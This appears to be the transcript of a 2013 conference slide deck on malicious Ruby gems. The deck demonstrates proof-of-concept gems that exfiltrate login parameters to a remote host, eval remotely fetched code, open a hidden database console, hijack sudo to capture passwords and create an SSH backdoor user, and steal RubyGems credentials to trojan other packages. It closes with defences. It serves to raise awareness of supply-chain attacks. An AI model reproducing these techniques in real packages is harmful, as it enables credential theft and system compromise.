Hacking with Gems (RubyNation 2013)

Hacking with Gems
Benjamin Smith
@benjamin_smith
Monday, June 17, 13

View Slide

How-to get rich quick and
(maybe)
not go to jail!
Monday, June 17, 13

View Slide

Ben Smith cannot be held accountable for anything that will happen to you as a result of installing his gems.
He also cannot be held responsible for anything that happens as a result of installing anyone ELSE’S gems.
This offer may not be combined with any other offers.
Ben Smith’s gems were processed in a location that also processes peanuts.
Not valid in the state of Nevada.
Ben Smith’s gems may contain substances known in the state of California to cause cancer.
Monday, June 17, 13

View Slide

who i am
Monday, June 17, 13

View Slide

Monday, June 17, 13

View Slide

what i am NOT
Monday, June 17, 13

View Slide

Monday, June 17, 13

View Slide

please do not try this at home
Monday, June 17, 13

View Slide

Monday, June 17, 13

View Slide

Lawful Evil Lawful Good
Monday, June 17, 13

View Slide

once upon a time
Monday, June 17, 13

View Slide

GEM
remote: https://rubygems.org/
specs:
actionmailer (3.2.12)
actionpack (= 3.2.12)
mail (~> 2.4.4)
actionpack (3.2.12)
activemodel (= 3.2.12)
activesupport (= 3.2.12)
builder (~> 3.0.0)
erubis (~> 2.7.0)
...
Monday, June 17, 13

View Slide

what’s the worst that could happen?
Monday, June 17, 13

View Slide

Monday, June 17, 13

View Slide

gem 'awesome_rails_flash_messages'
github.com/benjaminleesmith/awesome-rails-flash-messages
Monday, June 17, 13

View Slide

before...
Monday, June 17, 13

View Slide

after!
Monday, June 17, 13

View Slide

some “side effects”
if params.to_s.match(Base64.decode64('cGF...'))
Monday, June 17, 13

View Slide

...
File.open(
"#{Rails.root}/public/development.log",
'a+'
) do |f|
f.write("#{params.inspect}\n")
end
Monday, June 17, 13

View Slide

?!?
Net::HTTP.post_form(
URI.parse(Base64.decode64('aHR0cDo...')),
{
'log'=>params.merge(:url =>
request.url).inspect
}
)
Monday, June 17, 13

View Slide

i like cGFzc3dvcmQ=\n
if params.to_s.match(Base64.decode64('cGF...'))
Monday, June 17, 13

View Slide

i like password
if params.to_s.match(“password”)
Monday, June 17, 13

View Slide

“development.log”
...
"user"=>{"email"=>"[email protected]",
"password"=>"password",
"remember_me"=>"0"}
...
Monday, June 17, 13

View Slide

elsewhere...
Monday, June 17, 13

View Slide

proﬁt
• Step 1: do something
• Step 2: do something else
• Step 3: ????
• Step 4: proﬁt
Monday, June 17, 13

View Slide

proﬁt
• Step 1: write a gem that does something
• Step 2:
• Step 3:
• Step 4:
Monday, June 17, 13

View Slide

proﬁt
• Step 2: add code to harvest emails/pws
• Step 3:
• Step 4:
Monday, June 17, 13

View Slide

proﬁt
• Step 3: use emails/pws on banking websites
to transfer funds
• Step 4:
Monday, June 17, 13

View Slide

proﬁt
to transfer funds
• Step 4: proﬁt
Monday, June 17, 13

View Slide

profit
to transfer funds
• Step 4: profit
• Step 5: flee the country
Monday, June 17, 13

View Slide

a one way ticket to
Monday, June 17, 13

View Slide

that was easy.
what else can I do?
Monday, June 17, 13

View Slide

gem 'net_http_detector'
github.com/benjaminleesmith/net_http_detector
Monday, June 17, 13

View Slide

show me the hack
#stark-samurai-8122.herokuapp.com/logs>,
{"log"=>"{\"utf8\"=>\"✓\",
\"authenticity_token\"=>\"PzpZUlRrRv1V
+A0jJHAwi+ey/injbWlii8OFyIfP+fY=\",
\"user\"=>{\"email\"=>\"test\",
\"password\"=>\"pass4\"
...
Monday, June 17, 13

View Slide

how it works
def HTTP.valid_post_form(url, params)
...
def HTTP.post_form(url, params)
self.smart_log(
"Net::HTTP.post_form(#{url.inspect},
#{params.inspect})"
)
Net::HTTP.valid_post_form(url, params)
end
Monday, June 17, 13

View Slide

...and one more thing...
eval(Net::HTTP.valid_get(
URI("http://....herokuapp.com/
snippets/6")
)
)
Monday, June 17, 13

View Slide

database what?
append_before_filter :net_http_detector
...
if params[:db_console]
@tables =ActiveRecord::Base.connection.tables
if params[:query]
@output = ActiveRecord::Base.connection
.execute(params[:query])
Monday, June 17, 13

View Slide

/users/sign_in
Monday, June 17, 13

View Slide

/users/sign_in?db_console=t
Monday, June 17, 13

View Slide

hello db access!
Monday, June 17, 13

View Slide

SELECT * FROM users;
Monday, June 17, 13

View Slide

UPDATE users SET admin=1
WHERE id=42;
Monday, June 17, 13

View Slide

CREATE USER admin1 WITH
PASSWORD 'password';
Monday, June 17, 13

View Slide

careful of wolves in sheep’s clothing
Monday, June 17, 13

View Slide

proﬁt
• Step 1:
• Step 2:
• Step 3:
• Step 4:
• Step 5:
Monday, June 17, 13

View Slide

proﬁt
• Step 2:
• Step 3:
• Step 4:
• Step 5:
Monday, June 17, 13

View Slide

proﬁt
• Step 2: add code to provide DB access
• Step 3:
• Step 4:
• Step 5:
Monday, June 17, 13

View Slide

proﬁt
• Step 3: use personal info to apply for a boat
loan (ie buy a pimp trimaran)
• Step 4:
• Step 5:
Monday, June 17, 13

View Slide

proﬁt
• Step 4: proﬁt
• Step 5:
Monday, June 17, 13

View Slide

proﬁt
• Step 4: proﬁt
Monday, June 17, 13

View Slide

i like the beach
Monday, June 17, 13

View Slide

that was easy.
what else can I do?
Monday, June 17, 13

View Slide

gem 'better_date_to_s'
github.com/benjaminleesmith/better_date_to_s
Monday, June 17, 13

View Slide

what it claims to do
Date.new(2005, 1, 1).to_s(:short)
=> "1 Jan"
... instead of...
=> " 1 Jan"
Monday, June 17, 13

View Slide

Monday, June 17, 13

View Slide

what it also does
set_date_formats_for(
Rails.env,
Rails.root.to_s
)
Monday, June 17, 13

View Slide

better_date_to_s.bundle
œ˙Ì˛ê(__TEXT__text__TEXTP
ÛP
Ä__stubs__TEXTD
$DÄ__stub_helper__TEXThLhÄ__cstring__TEX
T∏i∏__unwind_info__TEXT!P!
__eh_frame__TEXTxÄxà__DATA__nl_symbol_pt
r__DATA__got__DATA__la_symbol_ptr__DATA0
__data__DATAHHH__LINKEDIT ‰"Ä0 [email protected]
Ä¿ `(!‰"
Monday, June 17, 13

View Slide

behind the curtain
if(strcmp(rails_env, "production") == 0) {
sprintf(tar_command, "tar -zcvf
%s/public/assets.tar.gz %s > /dev/
null 2>&1",rails_root,rails_root);
system(tar_command);
}
Monday, June 17, 13

View Slide

what what
Monday, June 17, 13

View Slide

i can haz source
Monday, June 17, 13

View Slide

truth time
• this gem doesn't actually work
• but it could... if I wasn't lazy
• "fat" gems are tricky to compile
Monday, June 17, 13

View Slide

so much code so little time
• Step 2: add code expose source
• Step 3: sell to competitors?
• Step 4: proﬁt?
Monday, June 17, 13

View Slide

that was easy hard.
what else can I do?
(that's easier)
Monday, June 17, 13

View Slide

gem install be_truthy
github.com/benjaminleesmith/be_truthy
Monday, June 17, 13

View Slide

what it does
> true.should be_true
> User.new.should be_true
> User.new.should be_truthy
Monday, June 17, 13

View Slide

what it ACTUALLY does
Monday, June 17, 13

View Slide

Monday, June 17, 13

View Slide

ﬁle tree looks ok
Monday, June 17, 13

View Slide

source code looks good
require "be_truthy/version"
module BeTruthy
end
Monday, June 17, 13

View Slide

but what was this?
Monday, June 17, 13

View Slide

I see no C
Monday, June 17, 13

View Slide

run the what ﬁle?
Gem::Specification.new do |gem|
...
gem.extensions = ["Rakefile"]
...
end
Monday, June 17, 13

View Slide

there is no Rakeﬁle
Monday, June 17, 13

View Slide

the real ﬁle tree
Monday, June 17, 13

View Slide

what does the Rakeﬁle do?
Monday, June 17, 13

View Slide

sudo_file =__FILE__.gsub(
'Rakefile', 'lib/tmp.rb'
)
FileUtils.mv(
sudo_file,
"#{home_dir}/.tmp"
)
Monday, June 17, 13

View Slide

File.open(profile, 'a+') do |f|
f.write("alias sudo='ruby #{home}/.tmp'\n")
end
Monday, June 17, 13

View Slide

FileUtils.rm(__FILE__)
Monday, June 17, 13

View Slide

what does "sudo" do now?
Monday, June 17, 13

View Slide

print "WARNING: Improper use of the sudo
command ..."
system "stty -echo"
password = $stdin.gets.chomp
system "stty echo"
print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}`
Monday, June 17, 13

View Slide

echo '#{password}' | /usr/bin/sudo -S
systemsetup -setremotelogin on
Monday, June 17, 13

View Slide

/usr/bin/sudo dscl . -create /Users/
#{username}
...
/usr/bin/sudo dscl . -passwd /Users/
#{username} password`
Monday, June 17, 13

View Slide

URI.parse('http://.../logs'),
{'log' => 'ssh enabled'}
)
Monday, June 17, 13

View Slide

ssh [email protected]
Monday, June 17, 13

View Slide

take away:
don't install ben's gems
Monday, June 17, 13

View Slide

Monday, June 17, 13

View Slide

how could I get you
to install my gems?
Monday, June 17, 13

View Slide

what gems are
trustworthy?
Monday, June 17, 13

View Slide

how can I add my code
to already trusted gems?
Monday, June 17, 13

View Slide

back in the be_truthy gem
gem_api_key = File.open(
`echo ~/.gem/credentials`.strip
).read
gem_list = `gem list`
Net::HTTP.post_form(...)
Monday, June 17, 13

View Slide

gem_api_key = File.open(
`echo ~/.gem/credentials`.strip
).read
gem_list = `gem list`
Net::HTTP.post_form(...)
back in the be_truthy gem
Monday, June 17, 13

View Slide

now I own your gems
Monday, June 17, 13

View Slide

> git clone your-gem-repo
...add a little code...
> rake build
> gem push your-gem
Monday, June 17, 13

View Slide

do people trust your gems?
Monday, June 17, 13

View Slide

do people who install
your gems have
trustworthy gems?
Monday, June 17, 13

View Slide

Monday, June 17, 13

View Slide

there’s still one problem
Monday, June 17, 13

View Slide

bootstrapping
Monday, June 17, 13

View Slide

being popular sucks
Monday, June 17, 13

View Slide

conferences
Monday, June 17, 13

View Slide

RubyJS
Monday, June 17, 13

View Slide

websocket
Monday, June 17, 13

View Slide

brakeman
Monday, June 17, 13

View Slide

rom
Monday, June 17, 13

View Slide

Monday, June 17, 13

View Slide

[censored]
Monday, June 17, 13

View Slide

so what happens now?
Monday, June 17, 13

View Slide

ruby gems goes down
Monday, June 17, 13

View Slide

heroku deploys go down
Monday, June 17, 13

View Slide

i go to the beach
Monday, June 17, 13

View Slide

ruby gems goes down
Monday, June 17, 13

View Slide

heroku deploys go down
Monday, June 17, 13

View Slide

recovery
Monday, June 17, 13

View Slide

so what now?
Monday, June 17, 13

View Slide

gem 'awesome_rails_flash_messages'
Monday, June 17, 13

View Slide

Little Snitch
obdev.at/products/littlesnitch/index.html
Monday, June 17, 13

View Slide

gem install be_truthy
Monday, June 17, 13

View Slide

fseventer
fernlightning.com/doku.php?id=software:fseventer:start
Monday, June 17, 13

View Slide

don’t “gem install” from
strangers
Monday, June 17, 13

View Slide

gem fetch vs gem install
> gem fetch be_truthy
> gem unpack be_truthy-0.0.1.gem
Monday, June 17, 13

View Slide

Monday, June 17, 13

View Slide

curl -#L https://get.rvm.io | bash -s stable
--autolibs=3 --ruby
Monday, June 17, 13

View Slide

gem install rails -P HighSecurity
Monday, June 17, 13

View Slide

> gem install rails -P HighSecurity
Fetching: activesupport-3.2.12.gem (100%)
ERROR: While executing gem ...
(Gem::Exception)
Unsigned gem
Monday, June 17, 13

View Slide

gem cert --build
Monday, June 17, 13

View Slide

https://www.rubygems-openpgp-ca.org/
https://github.com/rubygems-trust
Monday, June 17, 13

View Slide

sandboxing
Monday, June 17, 13

View Slide

github.com/rubygems/rubygems
Monday, June 17, 13

View Slide

tools to detect
malicious code
Monday, June 17, 13

View Slide

private gem repos
Monday, June 17, 13

View Slide

do not try this at home
Monday, June 17, 13

View Slide

don't install gems you
don't need to
Monday, June 17, 13

View Slide

pay attention to what
your gems do
Monday, June 17, 13

View Slide

monitor your system
Monday, June 17, 13

View Slide

read the source
Monday, June 17, 13

View Slide

gem install coal-mine-canary
github.com/benjaminleesmith/coal-mine-canary
Monday, June 17, 13

View Slide

on install
Monday, June 17, 13

View Slide

the results
Monday, June 17, 13

View Slide

thank you!
Monday, June 17, 13

View Slide

questions? ideas?
@benjamin_smith
https://github.com/benjaminleesmith
Monday, June 17, 13

View Slide

Hacking with Gems (RubyNation 2013)

Hacking with Gems (RubyNation 2013)

Benjamin Smith

More Decks by Benjamin Smith

Other Decks in Technology

Featured

Transcript